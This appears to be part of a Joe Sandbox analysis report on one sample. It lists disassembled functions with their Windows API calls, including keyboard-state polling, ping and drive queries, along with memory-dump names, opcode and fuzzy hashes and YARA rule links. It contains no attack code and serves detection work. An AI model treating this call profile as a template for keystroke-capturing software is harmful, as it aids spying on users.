                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00870723
                                                            • GetKeyState.USER32(0000005B), ref: 00870731
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: State$Async$Keyboard
                                                            • String ID:
                                                            • API String ID: 541375521-0
                                                            • Opcode ID: 00c8939f1432a0cfa5094e0ac795471833e05c4ed8b10b1d70b6f288845f4644
                                                            • Instruction ID: fa11d0e570ac6ccc35949e467cf99f3758a79ba7d5291b369fcb8bed504b4c29
                                                            • Opcode Fuzzy Hash: 00c8939f1432a0cfa5094e0ac795471833e05c4ed8b10b1d70b6f288845f4644
                                                            • Instruction Fuzzy Hash: CF51FD20A0478459FF34DBA488547EABFB4FF11380F08C59AD5CADA5C6D664DA8CCF62
                                                            Function 0086C72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDlgItem.USER32(?,00000001), ref: 0086C746
                                                            • GetWindowRect.USER32(00000000,?), ref: 0086C758
                                                            • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0086C7B6
                                                            • GetDlgItem.USER32(?,00000002), ref: 0086C7C1
                                                            • GetWindowRect.USER32(00000000,?), ref: 0086C7D3
                                                            • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0086C827
                                                            • GetDlgItem.USER32(?,000003E9), ref: 0086C835
                                                            • GetWindowRect.USER32(00000000,?), ref: 0086C846
                                                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0086C889
                                                            • GetDlgItem.USER32(?,000003EA), ref: 0086C897
                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0086C8B4
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0086C8C1
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                            • String ID:
                                                            • API String ID: 3096461208-0
                                                            • Opcode ID: e042c6264cfcd6cedef9a3ebcc20394403ad1148f77a10c61d8a8f35dc5bc1b1
                                                            • Instruction ID: dc1e5e1ac3a648a481000089f1c4ab6a704e9d6c54713c71438846f7e6cb1ce0
                                                            • Opcode Fuzzy Hash: e042c6264cfcd6cedef9a3ebcc20394403ad1148f77a10c61d8a8f35dc5bc1b1
                                                            • Instruction Fuzzy Hash: A6515D71B00205ABDB18DFA9DD89AAEBBBAFB98310F14813DF616D7291D7709D008B10
                                                            Function 0081201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00811B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00812036,?,00000000,?,?,?,?,008116CB,00000000,?), ref: 00811B9A
                                                            • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 008120D3
                                                            • KillTimer.USER32(-00000001,?,?,?,?,008116CB,00000000,?,?,00811AE2,?,?), ref: 0081216E
                                                            • DestroyAcceleratorTable.USER32(00000000), ref: 0084BEF6
                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008116CB,00000000,?,?,00811AE2,?,?), ref: 0084BF27
                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008116CB,00000000,?,?,00811AE2,?,?), ref: 0084BF3E
                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008116CB,00000000,?,?,00811AE2,?,?), ref: 0084BF5A
                                                            • DeleteObject.GDI32(00000000), ref: 0084BF6C
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                            • String ID:
                                                            • API String ID: 641708696-0
                                                            • Opcode ID: 3a73cefaadcafc30de4e4d9ce03f820fb024bd2fdaf19a65583e96e2e6105017
                                                            • Instruction ID: a17dc6d817f4d24ec6d4c880936a8e828d99c6d5e8c3f8f35c92c2279f65a363
                                                            • Opcode Fuzzy Hash: 3a73cefaadcafc30de4e4d9ce03f820fb024bd2fdaf19a65583e96e2e6105017
                                                            • Instruction Fuzzy Hash: E961AC30101A18EFCB29EF18DD48B69B7F5FF54316F14862AE242C6960DB75A8E4EF41
                                                            Function 008121A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008125DB: GetWindowLongW.USER32(?,000000EB), ref: 008125EC
                                                            • GetSysColor.USER32(0000000F), ref: 008121D3
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ColorLongWindow
                                                            • String ID:
                                                            • API String ID: 259745315-0
                                                            • Opcode ID: 1dfa69b45d6f2cac0bc9ef17757f9969f2f99eb875d2c8760721b707ef11d40e
                                                            • Instruction ID: 36f089c753ee02d5e4e2a8aa3f2daa50db3c091d49654b9a83d89f75ae2ddc2a
                                                            • Opcode Fuzzy Hash: 1dfa69b45d6f2cac0bc9ef17757f9969f2f99eb875d2c8760721b707ef11d40e
                                                            • Instruction Fuzzy Hash: F34171311001449ADB255F28DC48BF97769FF06325F184366FE65CA1E6D7318C92DB51
                                                            Function 0087AB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?,0089F910), ref: 0087AB76
                                                            • GetDriveTypeW.KERNEL32(00000061,008CA620,00000061), ref: 0087AC40
                                                            • _wcscpy.LIBCMT ref: 0087AC6A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: BuffCharDriveLowerType_wcscpy
                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                            • API String ID: 2820617543-1000479233
                                                            • Opcode ID: e52260959ce496467414a4ac6eaeb6d8be0d275cb00575efae9f5304804999c5
                                                            • Instruction ID: 43c32c13c19926c4f121ee5307947dc5f2c949cbaa7c446cbe96b47205ecc0d3
                                                            • Opcode Fuzzy Hash: e52260959ce496467414a4ac6eaeb6d8be0d275cb00575efae9f5304804999c5
                                                            • Instruction Fuzzy Hash: 4E51AC301083059BC728EF58C891EAEB7A9FFC4314F14882DF59AD72A6DB31D949CA53
                                                            Function 00819997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: __i64tow__itow__swprintf
                                                            • String ID: %.15g$0x%p$False$True
                                                            • API String ID: 421087845-2263619337
                                                            • Opcode ID: 34bf7876378149eb31e240d0f8dab0bea03e35e30ac60d0be2b91380217ca64e
                                                            • Instruction ID: 015e7142f3da9cc330231a583262c48fa6807d4db40c213184e4598ff578df3f
                                                            • Opcode Fuzzy Hash: 34bf7876378149eb31e240d0f8dab0bea03e35e30ac60d0be2b91380217ca64e
                                                            • Instruction Fuzzy Hash: F241E771604209AFDB24DF38D852FBA7BE8FF44304F20446EE689D7292EE759941CB52
                                                            Function 008973C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 008973D9
                                                            • CreateMenu.USER32 ref: 008973F4
                                                            • SetMenu.USER32(?,00000000), ref: 00897403
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00897490
                                                            • IsMenu.USER32(?), ref: 008974A6
                                                            • CreatePopupMenu.USER32 ref: 008974B0
                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 008974DD
                                                            • DrawMenuBar.USER32 ref: 008974E5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                            • String ID: 0$F
                                                            • API String ID: 176399719-3044882817
                                                            • Opcode ID: 208dcd215e77509440cdfd82fa5c2815cebca46ea492f9946f5b722a58e70f7b
                                                            • Instruction ID: 0039025e00cca7650fe1a4cee041165c73b2d280c105009a4e89ff11ac6cc2d7
                                                            • Opcode Fuzzy Hash: 208dcd215e77509440cdfd82fa5c2815cebca46ea492f9946f5b722a58e70f7b
                                                            • Instruction Fuzzy Hash: 68415874A11209EFDF10EF68D884A9ABBB9FF49310F184129FA55E7362D731A920CB54
                                                            Function 0089772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 008977CD
                                                            • CreateCompatibleDC.GDI32(00000000), ref: 008977D4
                                                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 008977E7
                                                            • SelectObject.GDI32(00000000,00000000), ref: 008977EF
                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 008977FA
                                                            • DeleteDC.GDI32(00000000), ref: 00897803
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0089780D
                                                            • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00897821
                                                            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0089782D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                            • String ID: static
                                                            • API String ID: 2559357485-2160076837
                                                            • Opcode ID: 612a640b9b36128ea10a19b7f5defc30af2ffd66e8a71e0119d6374c5939bced
                                                            • Instruction ID: 8139bf923cb874e42aefcead6e8818d43265da9992247204d38864748d2ff4f2
                                                            • Opcode Fuzzy Hash: 612a640b9b36128ea10a19b7f5defc30af2ffd66e8a71e0119d6374c5939bced
                                                            • Instruction Fuzzy Hash: 4931BE31101215BBDF16AFA4DC08FDA3B69FF0D320F180225FA15E20A1C731D821DBA4
                                                            Function 00837040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 0083707B
                                                              • Part of subcall function 00838D68: __getptd_noexit.LIBCMT ref: 00838D68
                                                            • __gmtime64_s.LIBCMT ref: 00837114
                                                            • __gmtime64_s.LIBCMT ref: 0083714A
                                                            • __gmtime64_s.LIBCMT ref: 00837167
                                                            • __allrem.LIBCMT ref: 008371BD
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008371D9
                                                            • __allrem.LIBCMT ref: 008371F0
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0083720E
                                                            • __allrem.LIBCMT ref: 00837225
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00837243
                                                            • __invoke_watson.LIBCMT ref: 008372B4
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                            • String ID:
                                                            • API String ID: 384356119-0
                                                            • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                            • Instruction ID: 96043bc3dfeac7b66100e9cddaa62cca3695e350071aa6e6f7dbad2149207729
                                                            • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                            • Instruction Fuzzy Hash: B3710AB1A04B0BABE7249E7DCC81B5BB3A8FF91324F14422AF815E7281E774D90087D1
                                                            Function 00872A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00872A31
                                                            • GetMenuItemInfoW.USER32(008D6890,000000FF,00000000,00000030), ref: 00872A92
                                                            • SetMenuItemInfoW.USER32(008D6890,00000004,00000000,00000030), ref: 00872AC8
                                                            • Sleep.KERNEL32(000001F4), ref: 00872ADA
                                                            • GetMenuItemCount.USER32(?), ref: 00872B1E
                                                            • GetMenuItemID.USER32(?,00000000), ref: 00872B3A
                                                            • GetMenuItemID.USER32(?,-00000001), ref: 00872B64
                                                            • GetMenuItemID.USER32(?,?), ref: 00872BA9
                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00872BEF
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00872C03
                                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00872C24
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                            • String ID:
                                                            • API String ID: 4176008265-0
                                                            • Opcode ID: 17aec11ed2d032eeb140b69d9140cb0f2e3860943e1892188fe831ad83c6c6bb
                                                            • Instruction ID: 8fd7309b5f547613a52895d14191302aef7737e18cd51714c578c71e46ee9265
                                                            • Opcode Fuzzy Hash: 17aec11ed2d032eeb140b69d9140cb0f2e3860943e1892188fe831ad83c6c6bb
                                                            • Instruction Fuzzy Hash: F061EEB0900249EFDB21DF64CC88EAEBBB8FB51318F14855AE849E3256D730ED15DB21
                                                            Function 00897192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00897214
                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00897217
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0089723B
                                                            • _memset.LIBCMT ref: 0089724C
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0089725E
                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 008972D6
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$LongWindow_memset
                                                            • String ID:
                                                            • API String ID: 830647256-0
                                                            • Opcode ID: f73d4fcd160a66ec506a37b34a7b2766aef6f928a03e2302eba57909c7e0b4ad
                                                            • Instruction ID: 2ad057b31f85c18a4baa0b1e447eef7bae869c35f8a3a072d88fb3fd593d4c39
                                                            • Opcode Fuzzy Hash: f73d4fcd160a66ec506a37b34a7b2766aef6f928a03e2302eba57909c7e0b4ad
                                                            • Instruction Fuzzy Hash: C8616D71A00208AFDB10EFA4CC81EEE77B8FB09714F14016AFA15E73A1D770A955DB50
                                                            Function 0086710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00867135
                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 0086718E
                                                            • VariantInit.OLEAUT32(?), ref: 008671A0
                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 008671C0
                                                            • VariantCopy.OLEAUT32(?,?), ref: 00867213
                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00867227
                                                            • VariantClear.OLEAUT32(?), ref: 0086723C
                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 00867249
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00867252
                                                            • VariantClear.OLEAUT32(?), ref: 00867264
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0086726F
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                            • String ID:
                                                            • API String ID: 2706829360-0
                                                            • Opcode ID: 802ecf66d36e97601916a55c7f86a7f6d7fcaf3c4a8fa8883fd4963c0dda9cf4
                                                            • Instruction ID: 614983bf9f1645d5386876491d9b59969c7732e895e7897ce303bef6cfa8007f
                                                            • Opcode Fuzzy Hash: 802ecf66d36e97601916a55c7f86a7f6d7fcaf3c4a8fa8883fd4963c0dda9cf4
                                                            • Instruction Fuzzy Hash: A0416031A00119AFCF04EF68D854DEEBBB9FF48354F058069FA56E7261DB30A945CB91
                                                            Function 00885A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WSAStartup.WSOCK32(00000101,?), ref: 00885AA6
                                                            • inet_addr.WSOCK32(?,?,?), ref: 00885AEB
                                                            • gethostbyname.WSOCK32(?), ref: 00885AF7
                                                            • IcmpCreateFile.IPHLPAPI ref: 00885B05
                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00885B75
                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00885B8B
                                                            • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00885C00
                                                            • WSACleanup.WSOCK32 ref: 00885C06
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                            • String ID: Ping
                                                            • API String ID: 1028309954-2246546115
                                                            • Opcode ID: 9e188a3d1c1a939479164b2c66b6b97fc02b83281ed6fa68a914b1957288b660
                                                            • Instruction ID: f462d71b2ddd07a661dbdbe14fbbdb0423ae95d5d03aec2cf28eecd460a4af85
                                                            • Opcode Fuzzy Hash: 9e188a3d1c1a939479164b2c66b6b97fc02b83281ed6fa68a914b1957288b660
                                                            • Instruction Fuzzy Hash: 2F517D316047109FDB11AF28CC95B6ABBE4FF48720F14892AF596DB2A1DB70EC40CB52
                                                            Function 0087B72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0087B73B
                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0087B7B1
                                                            • GetLastError.KERNEL32 ref: 0087B7BB
                                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 0087B828
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                            • API String ID: 4194297153-14809454
                                                            • Opcode ID: 9df5a2b6f68e04d5faf2ce20fa631441b9eac2e71e7ed84542c63f57495a32e3
                                                            • Instruction ID: c93304345e4d000de139f1997c367ed614009ace50c906b4f28a4313222a3219
                                                            • Opcode Fuzzy Hash: 9df5a2b6f68e04d5faf2ce20fa631441b9eac2e71e7ed84542c63f57495a32e3
